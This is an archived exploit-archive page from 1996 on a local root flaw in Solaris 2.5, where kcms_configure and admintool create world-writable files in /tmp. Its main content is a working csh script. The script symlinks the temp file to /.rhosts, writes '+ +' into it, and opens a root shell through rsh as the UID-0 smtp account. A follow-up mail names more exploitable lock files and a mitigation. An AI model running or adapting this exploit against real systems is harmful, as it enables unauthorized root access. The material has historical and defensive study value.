Solaris admintool and /usr/openwin/bin/kfcs_* tmpfile vulnerabilities
| Description: | Standard insecure tempfile creation, symlink to /.rhosts exploit |
| Author: | Jungseok Roh (beren@cosmos.kaist.ac.kr) posted the kcms_* stuff, Leif Hedstrom (leif@netscape.com) posted that admintool had the same problem. |
| Compromise: | root (local) |
| Vulnerable Systems: | Solaris 2.5.[01] |
| Date: | 26 July 1996 |
Exploit:
Wow.. I got a chance to use Ultra Sparc who runs Zolaris 2.5 several days ago ~
then ONe of my senior told me that there might be a Funny ,also UNCONCEIVABLE
bugs in Openwindows.. I trusted him...
and I traversed the file system under /usr/openwin ..
there were just four SUIDed files .. ( if Admin installed openwin packages )
xlock , ff.core , kcms* .. Problem made less vague
kcms_calibrate , kcms_configure is the objects we are approaching.
When examining the kcms families. I found a funny stuff .
kcms_configure makes the temporary(?) files in /tmp whoses permisson bit
is 666 ( Wow The sign of Devil ),, definately root owns it..
IT'S NAME is Kp_kcms_sys.sem !...
Then all u guys know the next procedure is .
hk.. I can't show u whole the procedure right now.
'Cause My Zolaris machine is "Network Unreachible ...".
One Odd thin's are Exploitation Succeeds when it interacts with kcms_calibrate!!
Major procedure is making the temporary files which linked to /.rhosts then
while kcms_configure tries to write /.rhosts make Thunder rolls using
kcms_calibrate and Make its power Powerful.. puha.. it's like seeing
Back To the Future III... then kcms_configure succeed its operation .
I made a simple script exploiting the machine who has that fatal bug.
hmm..but I can't erase one curiosity ..
Why Sun made this humble mistake ? ... plz someboy notify this bug to SUN.
I don't know Her E-mail Address .. :)
(what a simple!!) script follows .
this script shows u just PROCEDURE .. re-make on your demands .
cat > uhit.sh << E_O_F
#!/bin/csh
# JungSeok. Roh ( beren@cosmos.kaist.ac.kr )
# Junior in KAIST undergraduate. Under Management Dep .
set disp="cosmos.kaist.ac.kr:0.0"
setenv DISPLAY $disp
/bin/rm -rf /tmp/Kp_kcms_sys.sem
cd /tmp
#Making symbolic link
ln -s /.rhosts Kp_kcms_sys.sem
/usr/openwin/bin/kcms_calibrate &
while(1)
echo "Click the device you've chosen in kcms_calibrate window"
# Choose Any profiles .. hk..
# My 2.5 machine is unreachible son I can't get exact name of that profiles.
# What a fool I am.. jjap..
/usr/openwin/bin/kcms_configure -o -d $disp /usr/openwin/share/etc/devdata/profiles/Eksony17.mon
if( -f /.rhosts ) then
echo -n "+ +" >> /.rhosts
# As u know , we can't login as root .. use smtp account. that has UID 0 !!
/usr/bin/rsh localhost -l smtp csh -i
endif
end
E_O_F
__
There was a Legendary Security Task Force team whose Name is K/U/S ..
But BLOWED up by KOREAN National Prosecutor.. I hate them !! .......
They make me so sad .... Laughin' in bitter tears ... hk..hk..
JungSeok Roh / Junior in KAIST / beren@cosmos.kaist.ac.kr / +82-42-869-5400
------------Another mail:
From: anthony baxter (anthony.baxter@aaii.oz.au)
Date: Fri, 26 Jul 1996 15:10:25 +1000
> Fwiw, I believe "admintool" in Solaris-2.5 has exactly the same problem.
> /tmp/.group.lock for instance is created 666, no security checks...
> Just go to the "Groups" menu, and you'll have a nice and clean /.rhosts
> file to play with... :(
Hell, even easier, /tmp/.pwd.lock - you don't even need to select 'groups'. :)
or /tmp/.hosts.lock, and select 'hosts'.
cat 'clue' | admintool_author@sun.com
chmod ug-s /usr/bin/admintool (it's the only way to be sure)
truss/strace/sctrace/equivalent on applications such as these can be
quite enlightening (if nothing else, look for 'open()' calls.
Anthony
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
world.
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources:
